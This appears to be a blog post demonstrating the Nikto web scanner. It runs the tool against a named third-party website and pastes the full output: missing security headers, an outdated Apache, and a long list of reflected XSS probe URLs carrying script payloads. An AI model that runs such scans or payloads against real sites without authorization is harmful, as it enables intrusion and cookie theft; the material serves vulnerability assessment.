Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers.
sectools.org/tool/nikto/
#nikto -h www.targetanda.com
#nikto -h www.behindthename.com
strmn@strmnsLAB:~$ nikto -h www.behindthename.com
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 199.167.135.172
+ Target Hostname: www.behindthename.com
+ Target Port: 80
+ Start Time: 2015-11-23 12:47:08 (GMT7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS)
+ Retrieved x-powered-by header: PHP/5.3.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server leaks inodes via ETags, header found with file /crossdomain.xml, inode: 8128124, size: 165, mtime: Wed Nov 2 10:54:19 2011
+ “robots.txt” contains 1 entry which should be manually viewed.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-7501: /themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7505: /emailfriend/emailnews.php?id=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7504: /emailfriend/emailfaq.php?id=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7503: /emailfriend/emailarticle.php?id=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /administrator/upload.php?newbanner=1&choice=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7495: /administrator/popups/sectionswindow.php?type=web&link=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7498: /administrator/gallery/view.php?path=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7499: /administrator/gallery/uploadimage.php?directory=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7497: /administrator/gallery/navigation.php?directory=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7496: /administrator/gallery/gallery.php?directory=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /https-admserv/bin/index?/<script>alert(document.cookie)</script>: Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.
+ OSVDB-2876: /clusterframe.jsp?cluster=<script>alert(document.cookie)</script>: Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.
+ /upload.php?type=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4619: /soinfo.php?”><script>alert(‘Vulnerable’)</script>: The PHP script soinfo.php is vulnerable to Cross Site Scripting. Set expose_php = Off in php.ini.
+ /666%0a%0a<script>alert(‘Vulnerable’);</script>666.jsp: Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/MsgPage?action=test&msg=<script>alert(‘Vulnerable’)</script>: NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.ContainerServlet/<script>alert(‘Vulnerable’)</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.Context/<script>alert(‘Vulnerable’)</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.Globals/<script>alert(‘Vulnerable’)</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert(‘Vulnerable’)</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlets/MsgPage?action=badlogin&msg=<script>alert(‘Vulnerable’)</script>: The NetDetector install is vulnerable to Cross Site Scripting (XSS) in its invalid login message. http://www.cert.org/advisories/CA-2000-02.html.
+ /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=”><script>alert(document.cookie)</script>: IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-17665: /SiteServer/Knowledge/Default.asp?ctr=”><script>alert(‘Vulnerable’)</script>: Site Server is vulnerable to Cross Site Scripting
+ OSVDB-17666: /_mem_bin/formslogin.asp?”><script>alert(‘Vulnerable’)</script>: Site Server is vulnerable to Cross Site Scripting
+ /nosuchurl/><script>alert(‘Vulnerable’)</script>: JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html
+ OSVDB-3624: /webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>: Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9234: /cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert(‘Vulnerable’)</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi-bin/vq/demos/respond.pl?<script>alert(‘Vulnerable’)</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6458: /cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev”><script>alert(‘Vulnerable’)</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6458: /cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert(‘Vulnerable’)</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9230: /cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert(‘Vulnerable’)</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-2322: /cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-8661: /cgi-bin/fom/fom.cgi?cmd=<script>alert(‘Vulnerable’)</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-54110: /cgi-bin/fom.cgi?file=<script>alert(‘Vulnerable’)</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2748: /cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert(‘Vulnerable’);</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-651: /cgi-bin/cgicso?query=<script>alert(‘Vulnerable’)</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5031: /cgi-bin/betsie/parserl.pl/<script>alert(‘Vulnerable’)</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9283: /cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(‘Vulnerable’)</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /~/<script>alert(‘Vulnerable’)</script>.aspx?aspxerrorpath=null: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ /~/<script>alert(‘Vulnerable’)</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ /~/<script>alert(‘Vulnerable’)</script>.asp: Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ /catinfo?<u><b>TESTING: The Interscan Viruswall catinfo script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /user.php?op=userinfo&uname=<script>alert(‘hi’);</script>: The PHP-Nuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-41361: /templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>: MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9238: /supporter/index.php?t=updateticketlog&id=<script><script>alert(‘Vulnerable’)</script></script>: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9238: /supporter/index.php?t=tickettime&id=<script><script>alert(‘Vulnerable’)</script></script>: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9238: /supporter/index.php?t=ticketfiles&id=<script><script>alert(‘Vulnerable’)</script></script>: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /sunshop.index.php?action=storenew&username=<script>alert(‘Vulnerable’)</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ OSVDB-20232: /submit.php?subject=<script>alert(‘Vulnerable’)</script>&story=<script>alert(‘Vulnerable’)</script>&storyext=<script>alert(‘Vulnerable’)</script>&op=Preview: This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-27097: /ss000007.pl?PRODREF=<script>alert(‘Vulnerable’)</script>: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5049: /setup.exe?<script>alert(‘Vulnerable’)</script>&page=list_users&user=P: CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2689: /servlet/ContentServer?pagename=<script>alert(‘Vulnerable’)</script>: Open Market Inc. ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. http://www.cert.org/advisories/CA-2000-02.html.
+ /search.asp?term=<script>alert(‘Vulnerable’)</script>: ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this). http://www.cert.org/advisories/CA-2000-02.html.
+ /samples/search.dll?query=<script>alert(document.cookie)</script>&logic=AND: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /replymsg.php?send=1&destin=<script>alert(‘Vulnerable’)</script>: This version of PHP-Nuke’s replymsg.php is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4599: /pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert(‘Vulnerable’)</script>%3Ca%20s=%22&code=1: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10″><script>alert(‘Vulnerable’)</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10″><script>alert(‘Vulnerable’)</script>&MMN_position=[X:X]: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1+”><script>alert(‘Vulnerable’)</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+”><script>alert(‘Vulnerable’)</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-59093: /phptonuke.php?filnavn=<script>alert(‘Vulnerable’)</script>: PHP-Nuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-32774: /phpinfo.php?VARIABLE=<script>alert(‘Vulnerable’)</script>: Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-32774: /phpinfo.php3?VARIABLE=<script>alert(‘Vulnerable’)</script>: Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-2193: /phpBB/viewtopic.php?topic_id=<script>alert(‘Vulnerable’)</script>: phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4297: /phpBB/viewtopic.php?t=17071&highlight=”>”<script>javascript:alert(document.cookie)</script>: phpBB is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-11145: /phorum/admin/header.php?GLOBALS[message]=<script>alert(‘Vulnerable’)</script>: Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-11144: /phorum/admin/footer.php?GLOBALS[message]=<script>alert(‘Vulnerable’)</script>: Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /Page/1,10966,,00.html?var=<script>alert(‘Vulnerable’)</script>: Vignette server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to the latest version.
+ /node/view/666″><script>alert(document.domain)</script>: Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5106: /netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /nav/cList.php?root=</script><script>alert(‘Vulnerable’)/<script>: RaQ3 server script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /myhome.php?action=messages&box=<script>alert(‘Vulnerable’)</script>: OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /msadm/user/login.php3?account_name=”><script>alert(‘Vulnerable’)</script>: The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /msadm/site/index.php3?authid=”><script>alert(‘Vulnerable’)</script>: The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /msadm/domain/index.php3?account_name=”><script>alert(‘Vulnerable’)</script>: The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50539: /modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>: Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules/Forums/bb_smilies.php?site_font=}–></style><script>alert(‘Vulnerable’)</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules/Forums/bb_smilies.php?name=<script>alert(‘Vulnerable’)</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules/Forums/bb_smilies.php?Default_Theme=<script>alert(‘Vulnerable’)</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules/Forums/bb_smilies.php?bgcolor1=”><script>alert(‘Vulnerable’)</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert(‘Vulnerable’)</script>: The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=Xforum&file=<script>alert(‘Vulnerable’)</script>&fid=2: The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5498: /modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert(‘Vulnerable’)</script>: Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=Members_List&file=index&letter=<script>alert(‘Vulnerable’)</script>: This install of PHP-Nuke’s modules.php is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-20235: /modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert(‘Vulnerable’)</script>: The DMOZGateway (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>: Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?name=Your_Account&op=userinfo&uname=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?name=Surveys&pollID=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6226: /modules.php?name=Stories_Archive&sa=show_month&year=<script>alert(‘Vulnerable’)</script>&month=3&month_l=test: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6226: /modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5914: /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert(‘Vulnerable’)</script>: This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3201: /megabook/admin.cgi?login=<script>alert(‘Vulnerable’)</script>: Megabook guestbook is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /mailman/listinfo/<script>alert(‘Vulnerable’)</script>: Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9256: /launch.jsp?NFuse_Application=<script>alert(‘Vulnerable’)</script>: NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9257: /launch.asp?NFuse_Application=<script>alert(‘Vulnerable’)</script>: NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5803: /isapi/testisa.dll?check1=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>: myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>: myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /html/cgi-bin/cgicso?query=<script>alert(‘Vulnerable’)</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2322: /gallery/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-20234: /friend.php?op=SiteSent&fname=<script>alert(‘Vulnerable’)</script>: This version of PHP-Nuke’s friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-31694: /forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert(‘Vulnerable’)</script>: YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9231: /error/500error.jsp?et=1<script>alert(‘Vulnerable’)</script>;: Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ /download.php?sortby=&dcategory=<script>alert(‘Vulnerable’)</script>: This version of PHP-Nuke’s download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ /comments.php?subject=<script>alert(‘Vulnerable’)</script>&comment=<script>alert(‘Vulnerable’)</script>&pid=0&sid=0&mode=&order=&thold=op=Preview: This version of PHP-Nuke’s comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50619: /cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>: RSA ClearTrust allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-651: /cgi-local/cgiemail-1.6/cgicso?query=<script>alert(‘Vulnerable’)</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-651: /cgi-local/cgiemail-1.4/cgicso?query=<script>alert(‘Vulnerable’)</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7022: /calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05: DCP-Portal v5.3.1 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-27096: /ca000007.pl?ACTION=SHOWCART&REFPAGE=”><script>alert(‘Vulnerable’)</script>: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-27097: /ca000001.pl?ACTION=SHOWCART&hop=”><script>alert(‘Vulnerable’)</script>&PATH=acatalog%2f: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-27095: /bb000001.pl<script>alert(‘Vulnerable’)</script>: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /article.cfm?id=1′<script>alert(document.cookie);</script>: With malformed URLs, ColdFusion is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4765: /apps/web/vs_diag.cgi?server=<script>alert(‘Vulnerable’)</script>: Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2243: /addressbook/index.php?surname=<script>alert(‘Vulnerable’)</script>: Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2243: /addressbook/index.php?name=<script>alert(‘Vulnerable’)</script>: Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /add.php3?url=ja&adurl=javascript:<script>alert(‘Vulnerable’)</script>: 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /a?<script>alert(‘Vulnerable’)</script>: Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.
+ OSVDB-54589: /a.jsp/<script>alert(‘Vulnerable’)</script>: JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert(‘Vulnerable’)</script>.thtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert(‘Vulnerable’)</script>.shtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert(‘Vulnerable’)</script>.jsp: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert(‘Vulnerable’)</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6662: /<script>alert(‘Vulnerable’)</script>: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9239: /mailman/admin/ml-name?”><script>alert(‘Vulnerable’)</script>;: Mailman is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-25499: /affich.php?image=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
+ OSVDB-25498: /diapo.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
+ OSVDB-700: /fcgi-bin/echo?foo=<script>alert(‘Vulnerable’)</script>: Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3954: /fcgi-bin/echo2?foo=<script>alert(‘Vulnerable’)</script>: Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
